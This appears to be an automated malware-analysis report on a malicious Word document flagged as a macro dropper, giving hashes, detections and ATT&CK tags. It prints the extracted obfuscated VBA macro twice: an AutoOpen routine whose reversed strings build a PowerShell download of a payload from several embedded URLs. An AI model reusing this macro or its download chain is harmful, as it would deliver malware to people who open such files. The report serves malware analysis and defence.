Office (OLE) malware analysis — malicious · fb26c412c049cb6a

MALICIOUS

Office (OLE)

150.5 KB Created: 2018-05-15 21:58:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: da7329fa3ca9ccff85621c54f9d13f66 SHA-1: 6b61c47a592134d4a438b8d088210d169cc3cacd SHA-256: fb26c412c049cb6a8fc18db7839e01c4d20ac20f5378db680a042ecaf8452a4e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6546023-0. Critical heuristics indicate the presence of a VBA AutoOpen macro that uses the Shell() function. This strongly suggests the macro is designed to execute arbitrary commands, likely to download and execute a secondary payload, which is a common dropper behavior.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6546023-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6546023-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 122605 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	122605 bytes
SHA-256: `fd704a2e8977b3579774d350d416eec2c691b3ad81afe6d2a4d79641147202ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "sFzAdiwjaU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub VACfHi(XjvRTq) RcLNNW = IpjkR HPNkPj = ciznbk lYbkt = lhEAXb + Sgn(37661 - NLTuqC - ISLBjO + Fix(43348)) - 68381 - CDbl(59944) ldBYj = 27084 End Sub Sub rWuZKN(oPwPW) slitdG = jJfPw cmzRE = zVCTHB FzMUQH = AfAvI + Sgn(90615 - wPirfb - karzul + Fix(48564)) - 17672 - CDbl(81483) arfAQ = 43067 PHlYzl = JIAwF ccZNV = VWWVn oiUQPd = stbXqL + Sgn(75626 - pollaD - pwSSf + Fix(83899)) - 1922 - CDbl(36491) lzhIDh = 87561 WQMaAE = Bhkjik NoStWw = zqrail iflIur = Jqwou + Sgn(67528 - zHUkI - kspJL + Fix(91072)) - 94684 - CDbl(48283) UzSSpX = 5338 End Sub Sub YnsWDz(FbPfA) WpZkJl = bwzupj wVctu = HwzQfj TEjjSY = zJshjl + Sgn(26461 - bozjT - ZjzVlF + Fix(52792)) - 50108 - CDbl(85720) FcqVX = 25029 cQtXm = uMIjkV SwNTu = kKhTP RicEv = AOVVQa + Sgn(8414 - FFIcYr - jrHOX + Fix(51266)) - 5041 - CDbl(55513) vzdzV = 89982 End Sub Sub Autoopen() On Error Resume Next INojH = whnOHO BEuXTh = VpXSzl ZTwER = mAOkH + Sgn(94665 - uZbITn - GqCGjn + Fix(6619)) - 94624 - CDbl(35523) WlVZXO = 82267 chqciOaM (pDsBq + EHvWMSqvjSuF + QWkwv) PwKnH = QqYiHp YNWbXX = kwdkF AsqKD = BEaXb + Sgn(65654 - owAlL - CTRwtu + Fix(25697)) - 48470 - CDbl(72044) QVaiCi = 46277 End Sub Sub NbAod(qutEjL) MRnDlj = wPphPa CBAQF = AXkvOp FzBIp = tEDmf + Sgn(32599 - cDwlTY - oosto + Fix(56663)) - 72041 - CDbl(68484) hsovPp = 93765 hrqhF = PVzGww zbpmf = GITMo QWtqV = mHkEbh + Sgn(41487 - qdYpWn - OiRwJk + Fix(47032)) - 81405 - CDbl(11003) fCXpc = 42193 dXMpou = HRwbck pAWBoc = LzNQiq fzuNHt = zbzan + Sgn(32903 - sowNVk - BBnotn + Fix(34536)) - 46729 - CDbl(96679) JEDcT = 3780 End Sub Sub VqRqZ(bALAT) QDJGG = wGZOFu cYQjNO = mjsiS bbMnim = NhVAzw + Sgn(95593 - vnGkX - wBLRz + Fix(73288)) - 89938 - CDbl(46545) KioHCV = 87739 End Sub Attribute VB_Name = "fTvNvCPlRQCq" Sub ltujia(VkADp) KWJou = CBbRb Bwvjj = shlZk XYurQv = sXvrt + Sgn(53573 - WBouKc - idcGp + Fix(7962)) - 60163 - CDbl(21412) OllPR = 43497 End Sub Function EHvWMSqvjSuF() On Error Resume Next Kkfwj = GGCEEz srOIap = Slbrnh hGHLK = uiJidj + Sgn(7687 - VDlzj - PWXcp + Fix(53194)) - 53399 - CDbl(76947) JoLCO = 47849 jPhCb = pYZMl INrWh = LKIaLA bVNCr = VWSzFw + Sgn(21604 - qrVzYS - obDMRV + Fix(12525)) - 77329 - CDbl(89898) Ejwzj = 53859 cXazqthY = LAdGp("TqNEf@Fr.)29]rAHC[]gNIrtS[,'n05'(eCAlper.)'$',)021]rAHC[+76]rAHC[+67]rAHC[((eCAlpe,", 29740 + 2 - 29740, 29740 + 75 - 29740) iUQnq = mYWjV ncnhH = uJqZWP XoARNr = PzPDC + Sgn(18574 - MRovml - HhRzq + Fix(24404)) - 79596 - CDbl(34774) IzBETb = 72745 spGwz = CwcHJY csdOcQ = tzjZKz CoBPJ = KlXQt + Sgn(11353 - AqKEnh - dmBdjh + Fix(70919)) - 51160 - CDbl(87056) hlzXz = 19511 ElLLs = LAdGp("L4iYY'+'xC'+'L'+';'+'mod'+'na'+'r )T'+'MItT'+'MI+'+'T'+'M'+'I'+'cej'+'bo-'+'wT'+'M'+'I+TMIeT'+'MI+'+'TMInT'+'MI(& ='+' d'+'sadas'+'nxCL'( %Liu1", 13262 + 6 - 13262, 13262 + 135 - 13262) rAMfrV = VWhcD imcVkQ = Xicajs jHHKB = iMnVzm + Sgn(33150 - IKzIXE - vJcniX + Fix(7546)) - 18304 - CDbl(45983) wwEdNO = 44948 ijqRTP = cvWjM XmYzLc = dwmUJu YVowRI = aikwQ + Sgn(17938 - irPnP - NZQfj + Fix(38751)) - 82855 - CDbl(8803) zVIZjt = 12978 UfSVdGHDsb = LAdGp("wF.D'+'d'+'as'+'n'+'xCL = BSNxCL;t'+'n'+'ei'+'l'+'C'+'beW.t'+'eN.'+'me'+'t'+'syS )TM'+'Itce'+'jbo-'+'TMI+'+'TMIw'+'TMI'+'+TMIenTMI(. '+'= Uv6", 52653 + 3 - 52653, 52653 + 135 - 52653) aODKw = nAvTf FWjtWV = FJPzRN jOnqcK = loZLNQ + Sgn(34574 - ikALIj - oOCKuB + Fix(95002)) - 20669 - CDbl(33107) zHaYNE = 82197 LBzUwn = XLWGcO mtfojX = JYDFj RcAGEw = MDvLF + Sgn(24138 - UkSQk - CcWSZN + Fix(38340)) - 83893 - CDbl(3836) wOSGbu = 21759 wPDqw = LAdGp("Gddth@/K'+'MaBk'+'b'+'/ku.oc.llab'+'too'+'f'+'ts'+'a'+'e'+'/'+'/:'+'ptth'+'@/Nx5uV'+'s'+'2'+'/ed.skr'+'eid-e'+'//:s'+'ptth TMI = X'+'CDAx'+'C'+'L;)'+'33'+'1282 ,0'+'0001(tx'+'en.'+'ds'+'ad@vq", 39700 + 5 - 39 ... (truncated)

SHA-256: fd704a2e8977b3579774d350d416eec2c691b3ad81afe6d2a4d79641147202ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "sFzAdiwjaU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VACfHi(XjvRTq)
RcLNNW = IpjkR
HPNkPj = ciznbk
lYbkt = lhEAXb + Sgn(37661 - NLTuqC - ISLBjO + Fix(43348)) - 68381 - CDbl(59944)
ldBYj = 27084
End Sub
Sub rWuZKN(oPwPW)
slitdG = jJfPw
cmzRE = zVCTHB
FzMUQH = AfAvI + Sgn(90615 - wPirfb - karzul + Fix(48564)) - 17672 - CDbl(81483)
arfAQ = 43067
PHlYzl = JIAwF
ccZNV = VWWVn
oiUQPd = stbXqL + Sgn(75626 - pollaD - pwSSf + Fix(83899)) - 1922 - CDbl(36491)
lzhIDh = 87561
WQMaAE = Bhkjik
NoStWw = zqrail
iflIur = Jqwou + Sgn(67528 - zHUkI - kspJL + Fix(91072)) - 94684 - CDbl(48283)
UzSSpX = 5338
End Sub
Sub YnsWDz(FbPfA)
WpZkJl = bwzupj
wVctu = HwzQfj
TEjjSY = zJshjl + Sgn(26461 - bozjT - ZjzVlF + Fix(52792)) - 50108 - CDbl(85720)
FcqVX = 25029
cQtXm = uMIjkV
SwNTu = kKhTP
RicEv = AOVVQa + Sgn(8414 - FFIcYr - jrHOX + Fix(51266)) - 5041 - CDbl(55513)
vzdzV = 89982
End Sub
Sub Autoopen()
On Error Resume Next
INojH = whnOHO
BEuXTh = VpXSzl
ZTwER = mAOkH + Sgn(94665 - uZbITn - GqCGjn + Fix(6619)) - 94624 - CDbl(35523)
WlVZXO = 82267
chqciOaM (pDsBq + EHvWMSqvjSuF + QWkwv)
PwKnH = QqYiHp
YNWbXX = kwdkF
AsqKD = BEaXb + Sgn(65654 - owAlL - CTRwtu + Fix(25697)) - 48470 - CDbl(72044)
QVaiCi = 46277
End Sub
Sub NbAod(qutEjL)
MRnDlj = wPphPa
CBAQF = AXkvOp
FzBIp = tEDmf + Sgn(32599 - cDwlTY - oosto + Fix(56663)) - 72041 - CDbl(68484)
hsovPp = 93765
hrqhF = PVzGww
zbpmf = GITMo
QWtqV = mHkEbh + Sgn(41487 - qdYpWn - OiRwJk + Fix(47032)) - 81405 - CDbl(11003)
fCXpc = 42193
dXMpou = HRwbck
pAWBoc = LzNQiq
fzuNHt = zbzan + Sgn(32903 - sowNVk - BBnotn + Fix(34536)) - 46729 - CDbl(96679)
JEDcT = 3780
End Sub
Sub VqRqZ(bALAT)
QDJGG = wGZOFu
cYQjNO = mjsiS
bbMnim = NhVAzw + Sgn(95593 - vnGkX - wBLRz + Fix(73288)) - 89938 - CDbl(46545)
KioHCV = 87739
End Sub

Attribute VB_Name = "fTvNvCPlRQCq"
Sub ltujia(VkADp)
KWJou = CBbRb
Bwvjj = shlZk
XYurQv = sXvrt + Sgn(53573 - WBouKc - idcGp + Fix(7962)) - 60163 - CDbl(21412)
OllPR = 43497
End Sub
Function EHvWMSqvjSuF()
On Error Resume Next
Kkfwj = GGCEEz
srOIap = Slbrnh
hGHLK = uiJidj + Sgn(7687 - VDlzj - PWXcp + Fix(53194)) - 53399 - CDbl(76947)
JoLCO = 47849
jPhCb = pYZMl
INrWh = LKIaLA
bVNCr = VWSzFw + Sgn(21604 - qrVzYS - obDMRV + Fix(12525)) - 77329 - CDbl(89898)
Ejwzj = 53859
cXazqthY = LAdGp("TqNEf@Fr.)29]rAHC[]gNIrtS[,'n05'(eCAlper.)'$',)021]rAHC[+76]rAHC[+67]rAHC[((eCAlpe,", 29740 + 2 - 29740, 29740 + 75 - 29740)
iUQnq = mYWjV
ncnhH = uJqZWP
XoARNr = PzPDC + Sgn(18574 - MRovml - HhRzq + Fix(24404)) - 79596 - CDbl(34774)
IzBETb = 72745
spGwz = CwcHJY
csdOcQ = tzjZKz
CoBPJ = KlXQt + Sgn(11353 - AqKEnh - dmBdjh + Fix(70919)) - 51160 - CDbl(87056)
hlzXz = 19511
ElLLs = LAdGp("L4iYY'+'xC'+'L'+';'+'mod'+'na'+'r )T'+'MItT'+'MI+'+'T'+'M'+'I'+'cej'+'bo-'+'wT'+'M'+'I+TMIeT'+'MI+'+'TMInT'+'MI(& ='+' d'+'sadas'+'nxCL'( %Liu1", 13262 + 6 - 13262, 13262 + 135 - 13262)
rAMfrV = VWhcD
imcVkQ = Xicajs
jHHKB = iMnVzm + Sgn(33150 - IKzIXE - vJcniX + Fix(7546)) - 18304 - CDbl(45983)
wwEdNO = 44948
ijqRTP = cvWjM
XmYzLc = dwmUJu
YVowRI = aikwQ + Sgn(17938 - irPnP - NZQfj + Fix(38751)) - 82855 - CDbl(8803)
zVIZjt = 12978
UfSVdGHDsb = LAdGp("wF.D'+'d'+'as'+'n'+'xCL = BSNxCL;t'+'n'+'ei'+'l'+'C'+'beW.t'+'eN.'+'me'+'t'+'syS )TM'+'Itce'+'jbo-'+'TMI+'+'TMIw'+'TMI'+'+TMIenTMI(. '+'= Uv6", 52653 + 3 - 52653, 52653 + 135 - 52653)
aODKw = nAvTf
FWjtWV = FJPzRN
jOnqcK = loZLNQ + Sgn(34574 - ikALIj - oOCKuB + Fix(95002)) - 20669 - CDbl(33107)
zHaYNE = 82197
LBzUwn = XLWGcO
mtfojX = JYDFj
RcAGEw = MDvLF + Sgn(24138 - UkSQk - CcWSZN + Fix(38340)) - 83893 - CDbl(3836)
wOSGbu = 21759
wPDqw = LAdGp("Gddth@/K'+'MaBk'+'b'+'/ku.oc.llab'+'too'+'f'+'ts'+'a'+'e'+'/'+'/:'+'ptth'+'@/Nx5uV'+'s'+'2'+'/ed.skr'+'eid-e'+'//:s'+'ptth TMI = X'+'CDAx'+'C'+'L;)'+'33'+'1282 ,0'+'0001(tx'+'en.'+'ds'+'ad@vq", 39700 + 5 - 39
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.